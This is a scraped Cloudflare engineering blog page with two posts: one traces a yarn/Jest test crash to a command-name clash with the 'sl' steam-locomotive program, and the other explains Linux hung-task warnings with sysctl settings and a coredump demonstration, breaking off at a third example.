\n \n
When I first saw that Jest was running sl
so many times, my first thought was to ask my colleague if sl
is a valid command on his Mac, and of course it is not. After all, which serious engineer would stuff their machine full of silly commands like sl
, gti
, cowsay
, or toilet
? The next thing I tried was to rename sl
to something else, and sure enough all my problems disappeared: yarn test
started working perfectly.
\n
So what does Jest have to do with Steam Locomotives?
\n \n \n \n
\n
Nothing, that’s what. The whole affair is an unfortunate naming clash between sl
the Steam Locomotive and sl
the Sapling CLI. Jest wanted sl
the source control system, but ended up getting steam-rolled by sl
the Steam Locomotive.
\n
Fortunately the devs took it in good humor, and made a (still unreleased) fix. Check out the train memes!
\n
\n
At this point the main story has ended. However, there are still some unresolved nagging questions, like…
\n
How did the crash arrive at the magic number of a relatively even 27 seconds?
\n \n \n \n
\n
I don’t know. Actually I’m not sure if a forked child executing sl
still has a terminal anymore, but the travel time of the train does depend on the terminal width. The wider it is, the longer it takes:
\n
🌈 ~ tput cols\n425\n🌈 ~ time sl\nsl 0.19s user 0.06s system 1% cpu 20.629 total\n🌈 ~ tput cols\n58\n🌈 ~ time sl \nsl 0.03s user 0.01s system 0% cpu 5.695 total
\n
So the first thing I tried was to run yarn test in a ridiculously narrow terminal and see what happens:
\n
Determin\ning test\n suites \nto run..\n. \n \n ● Test\n suite f\nailed to\n run \n \nthrown: \n[Error] \n \nerror Co\nmmand fa\niled wit\nh exit c\node 1. \ninfo Vis\nit https\n://yarnp\nkg.com/e\nn/docs/c\nli/run f\nor docum\nentation\n about t\nhis comm\nand. \nyarn tes\nt 1.92s\n user 0.\n67s syst\nem 9% cp\nu 27.088\n total \n🌈 back\nstage [m\naster] t\nput cols\n \n8
\n
Alas, the terminal width doesn’t affect jest at all. Jest calls sl via execa
so let’s mock that up locally:
\n
🌈 choochoo cat runSl.mjs \nimport {execa} from 'execa';\nconst { stdout } = await execa('tput', ['cols']);\nconsole.log('terminal colwidth:', stdout);\nawait execa('sl', ['root']);\n🌈 choochoo time node runSl.mjs\nterminal colwidth: 80\nnode runSl.mjs 0.21s user 0.06s system 4% cpu 6.730 total
\n
So execa
uses the default terminal width of 80, which takes the train 6.7 seconds to cross. And 27 seconds divided by 6.7 is awfully close to 4. So is Jest running sl
4 times? Let’s do a poor man’s bpftrace by hooking into sl
like so:
\n
#!/bin/bash\n\nuniqid=$RANDOM\necho "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid started" >> /home/yew/executed.log\n/usr/games/sl.actual "$@"\necho "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid ended" >> /home/yew/executed.log
\n
And if we check executed.log
, sl
is indeed executed in 4 waves, albeit by 5 workers simultaneously in each wave:
\n
#wave1\n2025-03-20 13:23:57.125482563 21049 started\n2025-03-20 13:23:57.127526987 21666 started\n2025-03-20 13:23:57.131099388 4897 started\n2025-03-20 13:23:57.134237754 102 started\n2025-03-20 13:23:57.137091737 15733 started\n#wave1 ends, wave2 starts\n2025-03-20 13:24:03.704588580 21666 ended\n2025-03-20 13:24:03.704621737 21049 ended\n2025-03-20 13:24:03.707780748 4897 ended\n2025-03-20 13:24:03.712086346 15733 ended\n2025-03-20 13:24:03.711953000 102 ended\n2025-03-20 13:24:03.714831149 18018 started\n2025-03-20 13:24:03.721293279 23293 started\n2025-03-20 13:24:03.724600164 27918 started\n2025-03-20 13:24:03.729763900 15091 started\n2025-03-20 13:24:03.733176122 18473 started\n#wave2 ends, wave3 starts\n2025-03-20 13:24:10.294286746 18018 ended\n2025-03-20 13:24:10.297261754 23293 ended\n2025-03-20 13:24:10.300925031 27918 ended\n2025-03-20 13:24:10.300950334 15091 ended\n2025-03-20 13:24:10.303498710 24873 started\n2025-03-20 13:24:10.303980494 18473 ended\n2025-03-20 13:24:10.308560194 31825 started\n2025-03-20 13:24:10.310595182 18452 started\n2025-03-20 13:24:10.314222848 16121 started\n2025-03-20 13:24:10.317875812 30892 started\n#wave3 ends, wave4 starts\n2025-03-20 13:24:16.883609316 24873 ended\n2025-03-20 13:24:16.886708598 18452 ended\n2025-03-20 13:24:16.886867725 31825 ended\n2025-03-20 13:24:16.890735338 16121 ended\n2025-03-20 13:24:16.893661911 21975 started\n2025-03-20 13:24:16.898525968 30892 ended\n#crash imminent! wave4 ending, wave5 starting...\n2025-03-20 13:24:23.474925807 21975 ended
\n
The logs were emitted for about 26.35 seconds, which is close to 27. It probably crashed just as wave4 was reporting back. And each wave lasts about 6.7 seconds, right on the money with manual measurement.
\n
So why is Jest running sl in 4 waves? Why did it crash at the start of the 5th wave?
\n \n \n \n
\n
Let’s again modify the poor man’s bpftrace to also log the args and working directory:
\n
echo "$(date --utc +"%Y-%m-%d %H:%M:%S.%N") $uniqid started: $@ at $PWD" >> /home/yew/executed.log
\n
From the results we can see that the 5 workers are busy executing sl root
, which corresponds to the getRoot()
function in jest-change-files/sl.ts
\n
2025-03-21 05:50:22.663263304 started: root at /home/yew/cloudflare/repos/backstage/packages/app/src\n2025-03-21 05:50:22.665550470 started: root at /home/yew/cloudflare/repos/backstage/packages/backend/src\n2025-03-21 05:50:22.667988509 started: root at /home/yew/cloudflare/repos/backstage/plugins/access/src\n2025-03-21 05:50:22.671781519 started: root at /home/yew/cloudflare/repos/backstage/plugins/backstage-components/src\n2025-03-21 05:50:22.673690514 started: root at /home/yew/cloudflare/repos/backstage/plugins/backstage-entities/src\n2025-03-21 05:50:29.247573899 started: root at /home/yew/cloudflare/repos/backstage/plugins/catalog-types-common/src\n2025-03-21 05:50:29.251173536 started: root at /home/yew/cloudflare/repos/backstage/plugins/cross-connects/src\n2025-03-21 05:50:29.255263605 started: root at /home/yew/cloudflare/repos/backstage/plugins/cross-connects-backend/src\n2025-03-21 05:50:29.257293780 started: root at /home/yew/cloudflare/repos/backstage/plugins/pingboard-backend/src\n2025-03-21 05:50:29.260285783 started: root at /home/yew/cloudflare/repos/backstage/plugins/resource-insights/src\n2025-03-21 05:50:35.823374079 started: root at /home/yew/cloudflare/repos/backstage/plugins/scaffolder-backend-module-gaia/src\n2025-03-21 05:50:35.825418386 started: root at /home/yew/cloudflare/repos/backstage/plugins/scaffolder-backend-module-r2/src\n2025-03-21 05:50:35.829963172 started: root at /home/yew/cloudflare/repos/backstage/plugins/security-scorecard-dash/src\n2025-03-21 05:50:35.832597778 started: root at /home/yew/cloudflare/repos/backstage/plugins/slo-directory/src\n2025-03-21 05:50:35.834631869 started: root at /home/yew/cloudflare/repos/backstage/plugins/software-excellence-dashboard/src\n2025-03-21 05:50:42.404063080 started: root at /home/yew/cloudflare/repos/backstage/plugins/teamcity/src
\n
The 16 entries here correspond neatly to the 16 rootDirs
configured in Jest for Cloudflare’s backstage. We have 5 trains, and we want to visit 16 stations so let’s do some simple math. 16/5.0 = 3.2 which means our trains need to go back and forth 4 times at a minimum to cover them all.
\n
Final mystery: Why did it crash?
\n \n \n \n
\n
Let’s go back to the very start of our journey. The original [Error]
thrown was actually from here and after modifying node_modules/jest-changed-files/index.js
, I found that the error is shortMessage: 'Command failed with ENAMETOOLONG: sl status...
‘ and the reason why became clear when I interrogated Jest about what it thinks the repos are.
While the git repo is what you’d expect, the sl “repo” looks amazingly like a train wreck in motion:
\n
got repos.git as Set(1) { '/home/yew/cloudflare/repos/backstage' }\ngot repos.sl as Set(1) {\n '\\x1B[?1049h\\x1B[1;24r\\x1B[m\\x1B(B\\x1B[4l\\x1B[?7h\\x1B[?25l\\x1B[H\\x1B[2J\\x1B[15;80H_\\x1B[15;79H_\\x1B[16d|\\x1B[9;80H_\\x1B[12;80H|\\x1B[13;80H|\\x1B[14;80H|\\x1B[15;78H__/\\x1B[16;79H|/\\x1B[17;80H\\\\\\x1B[9;\n 79H_D\\x1B[10;80H|\\x1B[11;80H/\\x1B[12;79H|\\x1B[K\\x1B[13d\\b|\\x1B[K\\x1B[14d\\b|/\\x1B[15;1H\\x1B[1P\\x1B[16;78H|/-\\x1B[17;79H\\\\_\\x1B[9;1H\\x1B[1P\\x1B[10;79H|(\\x1B[11;79H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b|\n _\\x1B[14;1H\\x1B[1P\\x1B[15;76H__/ =\\x1B[16;77H|/-=\\x1B[17;78H\\\\_/\\x1B[9;77H_D _\\x1B[10;78H|(_\\x1B[11;78H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b| _\\x1B[14;77H"https://blog.cloudflare.com/"\\x1B[15;75H__/\n =|\\x1B[16;76H|/-=|\\x1B[17;1H\\x1B[1P\\x1B[8;80H=\\x1B[9;76H_D _|\\x1B[10;77H|(_)\\x1B[11;77H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b|\n _\\r\\x1B[14d\\x1B[1P\\x1B[15d\\x1B[1P\\x1B[16;75H|/-=|_\\x1B[17;1H\\x1B[1P\\x1B[8;79H=\\r\\x1B[9d\\x1B[1P\\x1B[10;76H|(_)-\\x1B[11;76H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b| _\\r\\x1B[14d\\x1B[1P\\x1B[15;73H__/ =|\n o\\x1B[16;74H|/-=|_\\r\\x1B[17d\\x1B[1P\\x1B[8;78H=\\r\\x1B[9d\\x1B[1P\\x1B[10;75H|(_)-\\x1B[11;75H/\\x1B[K\\x1B[12d\\b\\b|\\x1B[K\\x1B[13d\\b|\n _\\r\\x1B[14d\\x1B[1P\\x1B[15d\\x1B[1P\\x1B[16;73H|/-=|_\\r\\x1B[17d\\x1B[1P\\x1B[8;77H=\\x1B[9;73H_D _| |\\x1B[10;74H|(_)-\\x1B[11;74H/ |\\x1B[12;73H| |\\x1B[13;73H| _\\x1B[14;73H"https://blog.cloudflare.com/" |\\x1B[15;71H__/\n =| o |\\x1B[16;72H|/-=|___|\\x1B[17;1H\\x1B[1P\\x 1B[5;79H(@\\x1B[7;77H(\\r\\x1B[8d\\x1B[1P\\x1B[9;72H_D _| |_\\x1B[10;1H\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;72H| _\\x1B[14;72H"https://blog.cloudflare.com/" |-\\x1B[15;70H__/\n =| o |=\\x1B[16;71H|/-=|___|=\\x1B[17;1H\\x1B[1P\\x1B[8d\\x1B[1P\\x1B[9;71H_D _| |_\\r\\x1B[10d\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;71H| _\\x1B[14;71H"https://blog.cloudflare.com/" |-\\x1B[15;69H__/ =| o\n |=-\\x1B[16;70H|/-=|___|=O\\x1B[17;71H\\\\_/ \\\\\\x1B[8;1H\\x1B[1P\\x1B[9;70H_D _| |_\\x1B[10;71H|(_)--- |\\x1B[11;71H/ | |\\x1B[12;70H| | |\\x1B[13;70H| _\\x1B[80G|\\x1B[14;70H"https://blog.cloudflare.com/"\n |-\\x1B[15;68H__/ =| o |=-~\\x1B[16;69H|/-=|___|=\\x1B[K\\x1B[17;70H\\\\_/ \\\\O\\x1B[8;1H\\x1B[1P\\x1B[9;69H_D _| |_\\r\\x1B[10d\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;69H| _\\x1B[79G|_\\x1B[14;69H"https://blog.cloudflare.com/"\n |-\\x1B[15;67H__/ =| o |=-~\\r\\x1B[16d\\x1B[1P\\x1B[17;69H\\\\_/ \\\\_\\x1B[4d\\b\\b(@@\\x1B[5;75H( )\\x1B[7;73H(@@@)\\r\\x1B[8d\\x1B[1P\\x1B[9;68H_D _|\n |_\\r\\x1B[10d\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;68H| _\\x1B[78G|_\\x1B[14;68H"https://blog.cloudflare.com/" |-\\x1B[15;66H__/ =| o |=-~~\\\\\\x1B[16;67H|/-=|___|= O\\x1B[17;68H\\\\_/ \\\\__/\\x1B[8;1H\\x1B[1P\\x1B[9;67H_D _|\n |_\\r\\x1B[10d\\x1B[1P\\x1B[11d\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;67H| _\\x1B[77G|_\\x1B[14;67H"https://blog.cloudflare.com/" |-\\x1B[15;65H__/ =| o |=-~O==\\x1B[16;66H|/-=|___|= |\\x1B[17;1H\\x1B[1P\\x1B[8d\\x1B[1P\\x1B[9;66H_D _|\n |_\\x1B[10;67H|(_)--- | H\\x1B[11;67H/ | | H\\x1B[12;66H| | | H\\x1B[13;66H| _\\x1B[76G|___H\\x1B[14;66H"https://blog.cloudflare.com/" |-\\x1B[15;64H__/ =| o |=-O==\\x1B[16;65H|/-=|___|=\n |\\r\\x1B[17d\\x1B[1P\\x1B[8d\\x1B[1P\\x1B[9;65H_D _| |_\\x1B[80G/\\x1B[10;66H|(_)--- | H\\\\\\x1B[11;1H\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;65H| _\\x1B[75G|___H_\\x1B[14;65H"https://blog.cloudflare.com/" |-\\x1B[15;63H__/ =| o |=-~~\\\\\n /\\x1B[16;64H|/-=|___|=O=====O\\x1B[17;65H\\\\_/ \\\\__/ \\\\\\x1B[1;4r\\x1B[4;1H\\n' + '\\x1B[1;24r\\x1B[4;74H( )\\x1B[5;71H(@@@@)\\x1B[K\\x1B[7;69H( )\\x1B[K\\x1B[8;68H====\n \\x1B[80G_\\x1B[9;1H\\x1B[1P\\x1B[10;65H|(_)--- | H\\\\_\\x1B[11;1H\\x1B[1P\\x1B[12d\\x1B[1P\\x1B[13;64H| _\\x1B[74G|___H_\\x1B[14;64H"https://blog.cloudflare.com/" |-\\x1B[15;62H__/ =| o |=-~~\\\\ /~\\x1B[16;63H|/-=|___|=\n ||\\x1B[K\\x1B[17;64H\\\\_/ \\\\O=====O\\x1B[8;67H==== \\x1B[79G_\\r\\x1B[9d\\x1B[1P\\x1B[10;64H|(_)--- | H\\\\_\\x1B[11;64H/ | | H |\\x1B[12;63H| | | H |\\x1B[13;63H|\n _\\x1B[73G|___H__/\\x1B[14;63H"https://blog.cloudflare.com/" |-\\x1B[15;61H__/ =| o |=-~~\\\\ /~\\r\\x1B[16d\\x1B[1P\\x1B[17;63H\\\\_/ \\\\_\\x1B[8;66H==== \\x1B[78G_\\r\\x1B[9d\\x1B[1P\\x1B[10;63H|(_)--- |\n H\\\\_\\r\\x1B[11d\\x1B[1P\\x1B[12;62H| | | H |_\\x1B[13;62H| _\\x1B[72G|___H__/_\\x1B[14;62H"https://blog.cloudflare.com/" |-\\x1B[15;60H__/ =| o |=-~~\\\\ /~~\\\\\\x1B[16;61H|/-=|___|= O=====O\\x1B[17;62H\\\\_/ \\\\__/\n \\\\__/\\x1B[8;65H==== \\x1B[77G_\\r\\x1B[9d\\x1B[1P\\x1B[10;62H|(_)--- | H\\\\_\\r\\x1B[11d\\x1B[1P\\x1B[12;61H| | | H |_\\x1B[13;61H| _\\x1B[71G|___H__/_\\x1B[14;61H"https://blog.cloudflare.com/" |-\\x1B[80GI\\x1B[15;59H__/ =|\n o |=-~O=====O==\\x1B[16;60H|/-=|___|= || |\\x1B[17;1H\\x1B[1P\\x1B[2;79H(@\\x1B[3;74H( )\\x1B[K\\x1B[4;70H(@@@@)\\x1B[K\\x1B[5;67H( )\\x1B[K\\x1B[7;65H(@@@)\\x1B[K\\x1B[8;64H====\n \\x1B[76G_\\r\\x1B[9d\\x1B[1P\\x1B[10;61H|(_)--- | H\\\\_\\x1B[11;61H/ | | H | |\\x1B[12;60H| | | H |__-\\x1B[13;60H| _\\x1B[70G|___H__/__|\\x1B[14;60H"https://blog.cloudflare.com/" |-\\x1B[79GI_\\x1B[15;58H__/ =| o\n |=-O=====O==\\x1B[16;59H|/-=|___|= || |\\r\\x1B[17d\\x1B[1P\\x1B[8;63H==== \\x1B[75G_\\r\\x1B[9d\\x1B[1P\\x1B[10;60H|(_)--- | H\\\\_\\r\\x1B[11d\\x1B[1P\\x1B[12;59H| | | H |__-\\x1B[13;59H|\n _\\x1B[69G|___H__/__|_\\x1B[14;59H"https://blog.cloudflare.com/" |-\\x1B[78GI_\\x1B[15;57H__/ =| o |=-~~\\\\ /~~\\\\ /\\x1B[16;58H|/-=|___|=O=====O=====O\\x1B[17;59H\\\\_/ \\\\__/ \\\\__/ \\\\\\x1B[8;62H====\n \\x1B[74G_\\r\\x1B[9d\\x1B[1P\\x1B[10;59H|(_)--- | H\\\\_\\r\\x1B | | H |__-\\x1B[13;58H| _\\x1B[68G|___H__/__|_\\x1B[14;58H"https://blog.cloudflare.com/" |-\\x1B[77GI_\\x1B[15;56H__/ =| o |=-~~\\\\ /~~\\\\ /~\\x1B[16;57H|/-=|___|=\n || ||\\x1B[K\\x1B[17;58H\\\\_/ \\\\O=====O=====O\\x1B[8;61H==== \\x1B[73G_\\r\\x1B[9d\\x1B[1P\\x1B[10;58H|(_)--- _\\x1B[67G|___H__/__|_\\x1B[14;57H"https://blog.cloudflare.com/" |-\\x1B[76GI_\\x1B[15;55H__/ =| o |=-~~\\\\ /~~\\\\\n /~\\r\\x1B[16d\\x1B[1P\\x1B[17;57H\\\\_/ \\\\_\\x1B[2;75H( ) (\\x1B[3;70H(@@@)\\x1B[K\\x1B[4;66H()\\x1B[K\\x1B[5;63H(@@@@)\\x1B[
\n \n
Acknowledgements
\n \n \n \n
\n
Thank you to my colleagues Mengnan Gong and Shuhao Zhang, whose ideas and perspectives helped narrow down the root causes of this mystery.
If you enjoy troubleshooting weird and tricky production issues, our engineering teams are hiring.
“],”published_at”:[0,”2025-04-02T14:00+01:00″],”updated_at”:[0,”2025-04-02T13:00:03.425Z”],”feature_image”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1yA1TgNlIUZwtZ4bIL39EJ/0bfc765dae00213eca7e48a337c8178e/image1.png”],”tags”:[1,[[0,{“id”:[0,”2UVIYusJwlvsmPYl2AvSuR”],”name”:[0,”Deep Dive”],”slug”:[0,”deep-dive”]}],[0,{“id”:[0,”383iv0UQ6Lp0GZwOAxGq2p”],”name”:[0,”Linux”],”slug”:[0,”linux”]}],[0,{“id”:[0,”3JAY3z7p7An94s6ScuSQPf”],”name”:[0,”Developer Platform”],”slug”:[0,”developer-platform”]}],[0,{“id”:[0,”4HIPcb68qM0e26fIxyfzwQ”],”name”:[0,”Developers”],”slug”:[0,”developers”]}]]],”relatedTags”:[0],”authors”:[1,[[0,{“name”:[0,”Yew Leong”],”slug”:[0,”yew-leong”],”bio”:[0],”profile_image”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/658l52gIu4kyDjwnJCelUt/d0a7c86def68692d50d9b4a0d6fc2f18/_tmp_mini_magick20221116-43-2dcplr.jpg”],”location”:[0],”website”:[0],”twitter”:[0],”facebook”:[0]}]]],”meta_description”:[0,”Yarn tests fail consistently at the 27-second mark. The usual suspects are swiftly eliminated to no avail. A deep dive is taken to comb through traces, only to be derailed into an unexpected crash investigation.”],”primary_author”:[0,{}],”localeList”:[0,{“name”:[0,”blog-english-only”],”enUS”:[0,”English for Locale”],”zhCN”:[0,”No Page for Locale”],”zhHansCN”:[0,”No Page for Locale”],”zhTW”:[0,”No Page for Locale”],”frFR”:[0,”No Page for Locale”],”deDE”:[0,”No Page for Locale”],”itIT”:[0,”No Page for Locale”],”jaJP”:[0,”No Page for Locale”],”koKR”:[0,”No Page for Locale”],”ptBR”:[0,”No Page for Locale”],”esLA”:[0,”No Page for Locale”],”esES”:[0,”No Page for Locale”],”enAU”:[0,”No Page for Locale”],”enCA”:[0,”No Page for Locale”],”enIN”:[0,”No Page for Locale”],”enGB”:[0,”No Page for Locale”],”idID”:[0,”No Page for Locale”],”ruRU”:[0,”No Page for Locale”],”svSE”:[0,”No Page for Locale”],”viVN”:[0,”No Page for Locale”],”plPL”:[0,”No Page for Locale”],”arAR”:[0,”No Page for Locale”],”nlNL”:[0,”No Page for Locale”],”thTH”:[0,”No Page for Locale”],”trTR”:[0,”No Page for Locale”],”heIL”:[0,”No Page for Locale”],”lvLV”:[0,”No Page for Locale”],”etEE”:[0,”No Page for Locale”],”ltLT”:[0,”No Page for Locale”]}],”url”:[0,”https://blog.cloudflare.com/yarn-test-suffers-strange-derailment”],”metadata”:[0,{“title”:[0,”A steam locomotive from 1993 broke my yarn test”],”description”:[0,”Yarn tests fail consistently at the 27-second mark. The usual suspects are swiftly eliminated to no avail. A deep dive is taken to comb through traces, only to be derailed into an unexpected crash investigation.”],”imgPreview”:[0,”https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4y36mkMs8GlYflk6MMmLnh/42840cf34748ac9b6619c5d47704db10/A_steam_locomotive_from_1993_broke_my_yarn_test-OG.png”]}]}],[0,{“id”:[0,”3UHNgpNPKn2IAwDUzD4m3a”],”title”:[0,”Searching for the cause of hung tasks in the Linux kernel”],”slug”:[0,”searching-for-the-cause-of-hung-tasks-in-the-linux-kernel”],”excerpt”:[0,”The Linux kernel can produce a hung task warning. Searching the Internet and the kernel docs, you can find a brief explanation that the process is stuck in the uninterruptible state.”],”featured”:[0,false],”html”:[0,”
Depending on your configuration, the Linux kernel can produce a hung task warning message in its log. Searching the Internet and the kernel documentation, you can find a brief explanation that the kernel process is stuck in the uninterruptable state and hasn’t been scheduled on the CPU for an unexpectedly long period of time. That explains the warning’s meaning, but doesn’t provide the reason it occurred. In this blog post we’re going to explore how the hung task warning works, why it happens, whether it is a bug in the Linux kernel or application itself, and whether it is worth monitoring at all.
\n
INFO: task XXX:1495882 blocked for more than YYY seconds.
\n \n \n \n
\n
The hung task message in the kernel log looks like this:
\n
INFO: task XXX:1495882 blocked for more than YYY seconds.\n Tainted: G O 6.6.39-cloudflare-2024.7.3 #1\n"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.\ntask:XXX state:D stack:0 pid:1495882 ppid:1 flags:0x00004002\n. . .
\n
Processes in Linux can be in different states. Some of them are running or ready to run on the CPU — they are in the TASK_RUNNING
state. Others are waiting for some signal or event to happen, e.g. network packets to arrive or terminal input from a user. They are in a TASK_INTERRUPTIBLE
state and can spend an arbitrary length of time in this state until being woken up by a signal. The most important thing about these states is that they still can receive signals, and be terminated by a signal. In contrast, a process in the TASK_UNINTERRUPTIBLE
state is waiting only for certain special classes of events to wake them up, and can’t be interrupted by a signal. The signals are not delivered until the process emerges from this state and only a system reboot can clear the process. It’s marked with the letter D
in the log shown above.
What if this wake up event doesn’t happen or happens with a significant delay? (A “significant delay” may be on the order of seconds or minutes, depending on the system.) Then our dependent process is hung in this state. What if this dependent process holds some lock and prevents other processes from acquiring it? Or if we see many processes in the D state? Then it might tell us that some of the system resources are overwhelmed or are not working correctly. At the same time, this state is very valuable, especially if we want to preserve the process memory. It might be useful if part of the data is written to disk and another part is still in the process memory — we don’t want inconsistent data on a disk. Or maybe we want a snapshot of the process memory when the bug is hit. To preserve this behaviour, but make it more controlled, a new state was introduced in the kernel: TASK_KILLABLE
— it still protects a process, but allows termination with a fatal signal.
\n
How Linux identifies the hung process
\n \n \n \n
\n
The Linux kernel has a special thread called khungtaskd
. It runs regularly depending on the settings, iterating over all processes in the D
state. If a process is in this state for more than YYY seconds, we’ll see a message in the kernel log. There are settings for this daemon that can be changed according to your wishes:
\n
$ sudo sysctl -a --pattern hung\nkernel.hung_task_all_cpu_backtrace = 0\nkernel.hung_task_check_count = 4194304\nkernel.hung_task_check_interval_secs = 0\nkernel.hung_task_panic = 0\nkernel.hung_task_timeout_secs = 10\nkernel.hung_task_warnings = 200
\n
At Cloudflare, we changed the notification threshold kernel.hung_task_timeout_secs
from the default 120 seconds to 10 seconds. You can adjust the value for your system depending on configuration and how critical this delay is for you. If the process spends more than hung_task_timeout_secs
seconds in the D state, a log entry is written, and our internal monitoring system emits an alert based on this log. Another important setting here is kernel.hung_task_warnings
— the total number of messages that will be sent to the log. We limit it to 200 messages and reset it every 15 minutes. It allows us not to be overwhelmed by the same issue, and at the same time doesn’t stop our monitoring for too long. You can make it unlimited by setting the value to “-1”.
To better understand the root causes of the hung tasks and how a system can be affected, we’re going to review more detailed examples.
\n
Example #1 or XFS
\n \n \n \n
\n
Typically, there is a meaningful process or application name in the log, but sometimes you might see something like this:
\n
INFO: task kworker/13:0:834409 blocked for more than 11 seconds.\n \tTainted: G \tO \t6.6.39-cloudflare-2024.7.3 #1\n"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.\ntask:kworker/13:0\tstate:D stack:0 \tpid:834409 ppid:2 flags:0x00004000\nWorkqueue: xfs-sync/dm-6 xfs_log_worker
\n
In this log, kworker
is the kernel thread. It’s used as a deferring mechanism, meaning a piece of work will be scheduled to be executed in the future. Under kworker
, the work is aggregated from different tasks, which makes it difficult to tell which application is experiencing a delay. Luckily, the kworker
is accompanied by the Workqueue
line. Workqueue
is a linked list, usually predefined in the kernel, where these pieces of work are added and performed by the kworker
in the order they were added to the queue. The Workqueue
name xfs-sync
and the function which it points to, xfs_log_worker
, might give a good clue where to look. Here we can make an assumption that the XFS is under pressure and check the relevant metrics. It helped us to discover that due to some configuration changes, we forgot no_read_workqueue
/ no_write_workqueue
flags that were introduced some time ago to speed up Linux disk encryption.
Summary: In this case, nothing critical happened to the system, but the hung tasks warnings gave us an alert that our file system had slowed down.
\n
Example #2 or Coredump
\n \n \n \n
\n
Let’s take a look at the next hung task log and its decoded stack trace:
\n
INFO: task test:964 blocked for more than 5 seconds.\n Not tainted 6.6.72-cloudflare-2025.1.7 #1\n"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.\ntask:test state:D stack:0 pid:964 ppid:916 flags:0x00004000\nCall Trace:\n<TASK>\n__schedule (linux/kernel/sched/core.c:5378 linux/kernel/sched/core.c:6697) \nschedule (linux/arch/x86/include/asm/preempt.h:85 (discriminator 13) linux/kernel/sched/core.c:6772 (discriminator 13)) \n[do_exit (linux/kernel/exit.c:433 (discriminator 4) linux/kernel/exit.c:825 (discriminator 4)) \n? finish_task_switch.isra.0 (linux/arch/x86/include/asm/irqflags.h:42 linux/arch/x86/include/asm/irqflags.h:77 linux/kernel/sched/sched.h:1385 linux/kernel/sched/core.c:5132 linux/kernel/sched/core.c:5250) \ndo_group_exit (linux/kernel/exit.c:1005) \nget_signal (linux/kernel/signal.c:2869) \n? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) \n? hrtimer_try_to_cancel.part.0 (linux/kernel/time/hrtimer.c:1347) \narch_do_signal_or_restart (linux/arch/x86/kernel/signal.c:310) \n? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) \n? hrtimer_nanosleep (linux/kernel/time/hrtimer.c:2105) \nexit_to_user_mode_prepare (linux/kernel/entry/common.c:176 linux/kernel/entry/common.c:210) \nsyscall_exit_to_user_mode (linux/arch/x86/include/asm/entry-common.h:91 linux/kernel/entry/common.c:141 linux/kernel/entry/common.c:304) \n? srso_return_thunk (linux/arch/x86/lib/retpoline.S:217) \ndo_syscall_64 (linux/arch/x86/entry/common.c:88) \nentry_SYSCALL_64_after_hwframe (linux/arch/x86/entry/entry_64.S:121) \n</TASK>
\n
The stack trace says that the process or application test
was blocked for more than 5 seconds
. We might recognise this user space application by the name, but why is it blocked? It’s always helpful to check the stack trace when looking for a cause. The most interesting line here is do_exit (linux/kernel/exit.c:433 (discriminator 4) linux/kernel/exit.c:825 (discriminator 4))
. The source code points to the coredump_task_exit
function. Additionally, checking the process metrics revealed that the application crashed during the time when the warning message appeared in the log. When a process is terminated based on some set of signals (abnormally), the Linux kernel can provide a core dump file, if enabled. The mechanism — when a process terminates, the kernel makes a snapshot of the process memory before exiting and either writes it to a file or sends it through the socket to another handler — can be systemd-coredump or your custom one. When it happens, the kernel moves the process to the D
state to preserve its memory and early termination. The higher the process memory usage, the longer it takes to get a core dump file, and the higher the chance of getting a hung task warning.
Let’s check our hypothesis by triggering it with a small Go program. We’ll use the default Linux coredump handler and will decrease the hung task threshold to 1 second.
Coredump settings:
\n
$ sudo sysctl -a --pattern kernel.core\nkernel.core_pattern = core\nkernel.core_pipe_limit = 16\nkernel.core_uses_pid = 1
\n
You can make changes with sysctl:
\n
$ sudo sysctl -w kernel.core_uses_pid=1
\n
Hung task settings:
\n
$ sudo sysctl -a --pattern hung\nkernel.hung_task_all_cpu_backtrace = 0\nkernel.hung_task_check_count = 4194304\nkernel.hung_task_check_interval_secs = 0\nkernel.hung_task_panic = 0\nkernel.hung_task_timeout_secs = 1\nkernel.hung_task_warnings = -1
\n
Go program:
\n
$ cat main.go\npackage main\n\nimport (\n\t"os"\n\t"time"\n)\n\nfunc main() {\n\t_, err := os.ReadFile("test.file")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\ttime.Sleep(8 * time.Minute) \n}
\n
This program reads a 10 GB file into process memory. Let’s create the file:
\n
$ yes this is 10GB file | head -c 10GB > test.file
\n
The last step is to build the Go program, crash it, and watch our kernel log:
\n
$ go mod init test\n$ go build .\n$ GOTRACEBACK=crash ./test\n$ (Ctrl+\\)
\n
Hooray! We can see our hung task warning:
\n
$ sudo dmesg -T | tail -n 31\nINFO: task test:8734 blocked for more than 22 seconds.\n Not tainted 6.6.72-cloudflare-2025.1.7 #1\n Blocked by coredump.\n"echo 0 > /proc/sys/kernel/hung_task_timeout_secs" disables this message.\ntask:test state:D stack:0 pid:8734 ppid:8406 task_flags:0x400448 flags:0x00004000
\n
By the way, have you noticed the Blocked by coredump.
line in the log? It was recently added to the upstream code to improve visibility and remove the blame from the process itself. The patch also added the task_flags
information, as Blocked by coredump
is detected via the flag PF_POSTCOREDUMP
, and knowing all the task flags is useful for further root-cause analysis.
Summary: This example showed that even if everything suggests that the application is the problem, the real root cause can be something else — in this case, coredump
.
\n
Example #3 or rtnl_mutex
\n \n \n \n
\n
